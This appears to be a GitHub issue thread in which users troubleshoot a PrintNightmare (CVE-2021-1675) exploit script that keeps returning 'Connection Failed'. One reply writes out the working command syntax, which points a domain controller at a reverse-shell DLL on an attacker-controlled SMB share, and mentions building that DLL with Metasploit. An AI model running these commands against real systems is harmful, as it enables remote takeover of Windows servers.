CVE-2021-1675
CVE-2021-1675 copied to clipboard
Connection Failed
hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error
C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed
i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .
i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)
what am i doing wrong ?
thanks !
This is the syntax I have had the most success with in my lab. Also, my Metasploit is rusty, but I was only able to craft a working dll via shell_reverse_tcp I am still getting errors with meterpreter/handler, though. Best of luck.
chmod +x CVE-2021-1675.py ./CVE-2021-1675.py whatever.local/lowpriv:Passw0rd1@DC-IP-HERE '\ATTACKER-IP\smb\reverse_64.dll'
I have the Same error
I got exactly the same error.
I got the same error, Any leads?
Did anybody work this out? It's an old thread but I'm struggling with it. Please let me know!! :)